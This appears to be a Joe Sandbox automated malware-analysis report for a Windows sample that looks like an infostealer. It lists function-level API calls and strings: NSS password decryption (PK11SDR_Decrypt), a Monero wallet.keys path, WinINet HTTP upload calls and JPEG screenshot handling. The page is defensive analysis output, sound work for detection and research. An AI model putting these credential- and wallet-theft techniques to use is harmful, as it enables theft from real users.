Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0004c6150938507c5e60c6186acab6cf41fb286c873a1eaa6f5d361502af8135
Instruction ID: 33243d04d1975618a04e6a933a8a13a7e00790dbe365e4682a12dc46160ab453
Opcode Fuzzy Hash: 0004c6150938507c5e60c6186acab6cf41fb286c873a1eaa6f5d361502af8135
Instruction Fuzzy Hash: 84317EB251C600AFE315BF19DC81BBAFBE5EF88710F06892EE7C483650D63158408B9B

Function 000B9750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 6C69CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C66582D), ref: 6C69CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C66582D), ref: 6C69CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6CFE98,?,?,?,?,?,6C66582D), ref: 6C69CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C69CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C69CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C69CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C69CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C69CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C69CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C69CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C69CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C69CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C69CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C69CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C69CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C69CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C69CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C69CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C69CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C69CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C69CE8A

Strings

java, xrefs: 6C69CC37
stackwalk, xrefs: 6C69CCF8
cpuallthreads, xrefs: 6C69CE16
unregisteredthreads, xrefs: 6C69CE58
nostacksampling, xrefs: 6C69CD7C
ipcmessages, xrefs: 6C69CDBE
fileio, xrefs: 6C69CC92
jsallocations, xrefs: 6C69CD0E
notimerresolutionchange, xrefs: 6C69CE00
samplingallthreads, xrefs: 6C69CE2C
nativeallocations, xrefs: 6C69CDA8
audiocallbacktracing, xrefs: 6C69CDD4
Unrecognized feature "%s"., xrefs: 6C69CEA0
screenshots, xrefs: 6C69CCD4
processcpu, xrefs: 6C69CE6E
power, xrefs: 6C69CE84
mainthreadio, xrefs: 6C69CC7C
markersallthreads, xrefs: 6C69CE42
preferencereads, xrefs: 6C69CD92
fileioall, xrefs: 6C69CCA8
noiostacks, xrefs: 6C69CCBE
default, xrefs: 6C69CC21
seqstyle, xrefs: 6C69CCE6
leaf, xrefs: 6C69CC66

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 602cefd0f958e7c68f7242adeed9a91ecb3ecbc503f71a6bb229bb2c15ae9e18
Instruction ID: 86e23dd8be6c638818287a695d03abbef18e979f159a2decd0edf4e43f665e4b
Opcode Fuzzy Hash: 602cefd0f958e7c68f7242adeed9a91ecb3ecbc503f71a6bb229bb2c15ae9e18
Instruction Fuzzy Hash: D05142D1B4562772FA0531156D20BEA1485EF5334AF14443AEE1BA2E90FB05E70FCAAF

Function 6C664470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C664730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6644B2,6C6DE21C,6C6DF7F8), ref: 6C66473E
Part of subcall function 6C664730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C66474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6644BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6644D2
InitOnceExecuteOnce.KERNEL32(6C6DF80C,6C65F240,?,?), ref: 6C66451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C66455C
LoadLibraryW.KERNEL32(?), ref: 6C664592
InitializeCriticalSection.KERNEL32(6C6DF770), ref: 6C6645A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C6645AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C6645BB
InitOnceExecuteOnce.KERNEL32(6C6DF818,6C65F240,?,?), ref: 6C664612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C664636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C664644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C66466D
VerSetConditionMask.NTDLL ref: 6C66469F
VerSetConditionMask.NTDLL ref: 6C6646AB
VerSetConditionMask.NTDLL ref: 6C6646B2
VerSetConditionMask.NTDLL ref: 6C6646B9
VerSetConditionMask.NTDLL ref: 6C6646C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6646CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C6646F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6646FD

Strings

l, xrefs: 6C664578
kernel32.dll, xrefs: 6C6644CD
WRusr.dll, xrefs: 6C6644B5
NativeNtBlockSet_Write, xrefs: 6C6646F7
Gml, xrefs: 6C6644FC
user32.dll, xrefs: 6C664557, 6C66463F

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: Gml$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-884719140
Opcode ID: 7f36ea0ce7a6cd817d4207c682ef3097cf320b583f35835c022c5327a6ca0a1b
Instruction ID: eab5048da82757be091df25168019b24db7482201df077dfba6ea1edc53506d4
Opcode Fuzzy Hash: 7f36ea0ce7a6cd817d4207c682ef3097cf320b583f35835c022c5327a6ca0a1b
Instruction Fuzzy Hash: AE6106B0604244AFEB00DF63D895BA57BB8EF86348F04C458E5049BA41D7F1AA85CF9F

Function 000A4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Part of subcall function 000A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000A4839
Part of subcall function 000A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000A4849

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000A4915
StrCmpCA.SHLWAPI(?,0139F5E0), ref: 000A493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000A4ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,000C0DDB,00000000,?,?,00000000,?,",00000000,?,0139F640), ref: 000A4DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000A4E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000A4E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000A4E49
InternetCloseHandle.WININET(00000000), ref: 000A4EAD
InternetCloseHandle.WININET(00000000), ref: 000A4EC5
HttpOpenRequestA.WININET(00000000,0139F6B0,?,0139ECE8,00000000,00000000,00400100,00000000), ref: 000A4B15

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

InternetCloseHandle.WININET(00000000), ref: 000A4ECF

Strings

", xrefs: 000A4BF2
------, xrefs: 000A49BD
------, xrefs: 000A4B28
", xrefs: 000A4D33
------, xrefs: 000A4C69

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 51a2b711686c4000db16fb7a4ec0b1c82c8360c8fb458d4b14d5a68af0eb6b35
Instruction ID: de6ffc7756cbfbbffe8279852dd6b848d85f70cc1399f3f3438d6d96551abc40
Opcode Fuzzy Hash: 51a2b711686c4000db16fb7a4ec0b1c82c8360c8fb458d4b14d5a68af0eb6b35
Instruction Fuzzy Hash: 9312DE71A10218BADB15EB90DCA6FEEB378BF56300F504199B10676492EF702F49CF62

Function 000AC990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 000AC9A5

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0139DDE8,00000000,?,000C144C,00000000,?,?), ref: 000ACA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 000ACA89
GetFileSize.KERNEL32(00000000,00000000), ref: 000ACA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 000ACAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 000ACAD9
StrStrA.SHLWAPI(?,0139DC20,000C0B52), ref: 000ACAF7
StrStrA.SHLWAPI(00000000,0139DC38), ref: 000ACB1E
StrStrA.SHLWAPI(?,0139E638,00000000,?,000C1458,00000000,?,00000000,00000000,?,013988D0,00000000,?,000C1454,00000000,?), ref: 000ACCA2
StrStrA.SHLWAPI(00000000,0139E678), ref: 000ACCB9

Part of subcall function 000AC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 000AC871
Part of subcall function 000AC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 000AC87C
Part of subcall function 000AC820: PK11_GetInternalKeySlot.NSS3 ref: 000AC88A
Part of subcall function 000AC820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 000AC8A5
Part of subcall function 000AC820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 000AC8EB
Part of subcall function 000AC820: PK11_FreeSlot.NSS3(?), ref: 000AC961

StrStrA.SHLWAPI(?,0139E678,00000000,?,000C145C,00000000,?,00000000,01398920), ref: 000ACD5A
StrStrA.SHLWAPI(00000000,01398B90), ref: 000ACD71

Part of subcall function 000AC820: lstrcat.KERNEL32(?,000C0B46), ref: 000AC943
Part of subcall function 000AC820: lstrcat.KERNEL32(?,000C0B47), ref: 000AC957
Part of subcall function 000AC820: lstrcat.KERNEL32(?,000C0B4E), ref: 000AC978

lstrlen.KERNEL32(00000000), ref: 000ACE44
CloseHandle.KERNEL32(00000000), ref: 000ACE9C
NSS_Shutdown.NSS3 ref: 000ACEAA

Strings

, xrefs: 000AC9C6

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: baf362edf6a094764b23c251a7b3d742fe9ac6b64e8eba08dd3d1a53db18c126
Instruction ID: 017b51ea4579c4b3f3ca54e2c77ddfa31d76dfda11535c5f1dd24bc73d2670cb
Opcode Fuzzy Hash: baf362edf6a094764b23c251a7b3d742fe9ac6b64e8eba08dd3d1a53db18c126
Instruction Fuzzy Hash: 38E1DC71A10108BBDB15EBA4EC96FEEB778AF15300F404169F10677592EF347A4ACB62

Function 000B9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 000B906C

Strings

image/jpeg, xrefs: 000B9136

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: 99c9b0b0b18af429030e7fdc609e75dfe483783d696eb34c8f5f01586c442e09
Instruction ID: 3f2bbd6cfa2a859d832a2246912dd69dd8bf78f8cd7c85c7adbb25f7316fe017
Opcode Fuzzy Hash: 99c9b0b0b18af429030e7fdc609e75dfe483783d696eb34c8f5f01586c442e09
Instruction Fuzzy Hash: 9F71CB75D50208EBDB14EFE4EC89FEEB7B9BB48700F108508F615AB290DB34A945CB61

Function 6C6AD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6AD4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD4FC
